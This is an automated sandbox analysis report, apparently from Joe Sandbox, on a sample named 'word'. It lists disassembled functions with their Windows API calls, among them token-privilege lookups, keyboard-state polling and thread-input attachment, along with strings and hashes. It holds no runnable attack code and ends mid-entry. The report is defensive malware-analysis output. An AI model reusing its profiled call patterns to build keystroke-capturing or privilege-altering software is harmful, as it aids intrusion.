                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyWindow
                                                                    • String ID: static
                                                                    • API String ID: 3375834691-2160076837
                                                                    • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                    • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                    • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                    • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                    • _memcmp.LIBCMT ref: 004394A9
                                                                    • CloseHandle.KERNEL32(?), ref: 004394F8
                                                                    Strings
                                                                    • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                    • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                    • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                    • API String ID: 1446985595-805462909
                                                                    • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                    • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                    • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                    • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                    • String ID: 0$X1
                                                                    • API String ID: 176399719-3791290762
                                                                    • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                    • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                    • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                    • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                    • API String ID: 2907320926-41864084
                                                                    • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                    • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                    • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                    • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                    APIs
                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046735D
                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004673ED
                                                                    • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00467559
                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?), ref: 004675E4
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                    • String ID:
                                                                    • API String ID: 1932665248-0
                                                                    • Opcode ID: ffcd1bec9a83d3f8d1e19f5fea15e6b7408f6d51f63917b05aefd4bf37ebf98c
                                                                    • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                    • Opcode Fuzzy Hash: ffcd1bec9a83d3f8d1e19f5fea15e6b7408f6d51f63917b05aefd4bf37ebf98c
                                                                    • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00444D8A
                                                                    • GetAsyncKeyState.USER32 ref: 00444E0F
                                                                    • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                    • GetAsyncKeyState.USER32 ref: 00444E40
                                                                    • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                    • GetAsyncKeyState.USER32 ref: 00444E69
                                                                    • GetKeyState.USER32(00000011), ref: 00444E77
                                                                    • GetAsyncKeyState.USER32 ref: 00444E8F
                                                                    • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                    • GetAsyncKeyState.USER32 ref: 00444EB5
                                                                    • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                    • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                    • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                    • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HH
                                                                    • API String ID: 0-2761332787
                                                                    • Opcode ID: 17340be2b53e1581c3fae1d9d48ac113ad63cd8a7d5357e3f872bfc17f18a24f
                                                                    • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                    • Opcode Fuzzy Hash: 17340be2b53e1581c3fae1d9d48ac113ad63cd8a7d5357e3f872bfc17f18a24f
                                                                    • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004508FC
                                                                    • _wcslen.LIBCMT ref: 00450944
                                                                    • _wcscat.LIBCMT ref: 00450955
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                    • String ID: -----$SysListView32
                                                                    • API String ID: 4008455318-3975388722
                                                                    • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                    • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                    • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                    • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                    • GetDlgCtrlID.USER32 ref: 00469289
                                                                    • GetParent.USER32 ref: 004692A4
                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                    • GetDlgCtrlID.USER32 ref: 004692AE
                                                                    • GetParent.USER32 ref: 004692C7
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2040099840-1403004172
                                                                    • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                    • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                    • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                    • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                    • GetDlgCtrlID.USER32 ref: 00469483
                                                                    • GetParent.USER32 ref: 0046949E
                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                    • GetDlgCtrlID.USER32 ref: 004694A8
                                                                    • GetParent.USER32 ref: 004694C1
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2040099840-1403004172
                                                                    • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                    • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                    • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                    • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3413494760-0
                                                                    • Opcode ID: 33402ee73836a5b31aacdb55303bfa0b919f90bba8dbc8bae2be4476753a8163
                                                                    • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                    • Opcode Fuzzy Hash: 33402ee73836a5b31aacdb55303bfa0b919f90bba8dbc8bae2be4476753a8163
                                                                    • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32(?,?,?,?,0045FDE0,?,?,00000001), ref: 004377D7
                                                                    • GetForegroundWindow.USER32 ref: 004377EB
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437809
                                                                    • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043782E
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043783D
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0043788D
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004378A1
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004378AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                    • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                    • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                    • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll
                                                                    • String ID: 0%d$DOWN$OFF
                                                                    • API String ID: 3832890014-468733193
                                                                    • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                    • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                    • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                    • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                    • VariantClear.OLEAUT32 ref: 0045E970
                                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                    • __swprintf.LIBCMT ref: 0045EB1F
                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                    Strings
                                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 43541914-1568723262
                                                                    • Opcode ID: 69726a0771c0964fbdc1cfe30a6943ed8c6f89156749c4813f31c78b647c31d2
                                                                    • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                    • Opcode Fuzzy Hash: 69726a0771c0964fbdc1cfe30a6943ed8c6f89156749c4813f31c78b647c31d2
                                                                    • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                    APIs
                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                    • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: DecrementInterlocked$Sleep
                                                                    • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                    • API String ID: 2250217261-3412429629
                                                                    • Opcode ID: 215c5e34d51a873ec91725a31313336b759110b61dd29ed402e16e4472e8412f
                                                                    • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                    • Opcode Fuzzy Hash: 215c5e34d51a873ec91725a31313336b759110b61dd29ed402e16e4472e8412f
                                                                    • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
